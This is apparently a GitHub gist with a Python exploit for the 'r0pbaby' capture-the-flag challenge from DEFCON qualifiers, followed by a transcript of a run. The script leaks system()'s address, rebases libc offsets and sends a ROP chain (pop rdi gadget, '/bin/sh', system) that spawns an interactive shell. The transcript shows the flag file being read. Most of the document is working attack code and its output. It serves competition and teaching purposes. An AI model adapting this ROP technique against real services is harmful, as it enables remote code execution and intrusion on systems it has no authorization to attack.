@ytn86
Last active August 29, 2015 14:21
DEFCON 25 Quals r0pbaby
#!/usr/bin/env python3
import struct
import sys
import telnetlib
# Challenge service endpoint as recorded in the gist.
HOST = 'r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me'
PORT = 10436
# Working notes: locating the "/bin/sh" string and a "pop rdi ; ret" gadget
# in the libc build shipped with the challenge (libc-2.19_15.so).
"""
% strings -tx libc-2.19_15.so|grep "/bin/sh"
17ccdb /bin/sh
% rp --file=libc-2.19_15.so --rop=1 --unique|grep "pop rdi"
0x000fa47a: pop rdi ; call rax ; (1 found)
0x000831a8: pop rdi ; jmp rax ; (2 found)
0x00103fe2: pop rdi ; rep ret ; (2 found)
0x00022b1a: pop rdi ; ret ; (506 found)
0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
"""
# Offsets relative to the load base of libc-2.19_15.so.  The exploit only
# ever uses their differences against the leaked address of system(), so the
# chain is independent of where libc is mapped at runtime.
binsh_offset = 0x17ccdb    # "/bin/sh", from the strings output above
system_offset = 0x46640    # system(); not in the output above -- presumably from nm/readelf, verify against the same libc
popret_offset = 0x22b1a    # "pop rdi ; ret", from the rp output above
def rp(addr):
    """Encode *addr* as an 8-byte little-endian value suitable for a 64-bit stack slot.

    Raises struct.error if *addr* is negative or does not fit in 64 bits.
    """
    return struct.pack('<Q', addr)
def get_addr(tn, name):
    """Ask the service (menu option 2) for the runtime address of libc symbol *name*.

    Sends ``2`` and the symbol name, skips the echoed ``<name>: `` prompt,
    parses the hexadecimal address on the remainder of that line, prints it
    and returns it as an int.  This single leak is what lets the chain be
    rebased onto the live libc mapping.  Both reads block without a timeout,
    and a non-hexadecimal reply raises ValueError.
    """
    label = name.encode()
    tn.write(b'2\n' + label + b'\n')
    tn.read_until(label + b': ')
    reply = tn.read_until(b'\n').decode()
    addr = int(reply, 16)
    print('{0} :{1}'.format(name, hex(addr)))
    return addr
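def exploit():
    """Leak system()'s address, deliver the ROP chain, then hand the session to the user.

    Menu option 2 (via get_addr) reveals where ``system`` lives at runtime;
    every other address is derived from it with the libc-2.19_15.so offsets
    at the top of the file.  Menu option 3 then takes a byte count and a raw
    buffer ("Nom nom r0p buffer to stack" in the transcript below).

    The Telnet session is closed on every exit path.  Note that telnetlib is
    deprecated since Python 3.11 and removed in 3.13, so this needs an older
    interpreter or a socket-based replacement.
    """
    tn = telnetlib.Telnet(HOST, PORT)
    try:
        system = get_addr(tn, 'system')
        libc_base = system - system_offset
        # Chain layout: 8 bytes of filler, then gadget / "/bin/sh" / system(),
        # each rebased onto the leaked libc mapping.
        chain = [
            b'deadbeef',
            rp(libc_base + popret_offset),
            rp(libc_base + binsh_offset),
            rp(system),
        ]
        payload = b''.join(chain) + b'\n'
        tn.write(b'3\n')
        tn.write(b'32\n')  # byte count the service prompts for before the buffer
        tn.write(payload)
        tn.interact()
    finally:
        tn.close()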
def main():
    """Script entry point: run the exploit against HOST:PORT."""
    return exploit()
if __name__ == '__main__':
    main()
# Session transcript captured when the script was run against the challenge
# service, kept verbatim from the gist.  Note the leaked system() address on
# the first line and that the service prints the menu a second time before
# the chain runs.
"""
% python exploit.py
system :0x7f6066881640
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
cat /home/r0pbaby/flag
The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
"""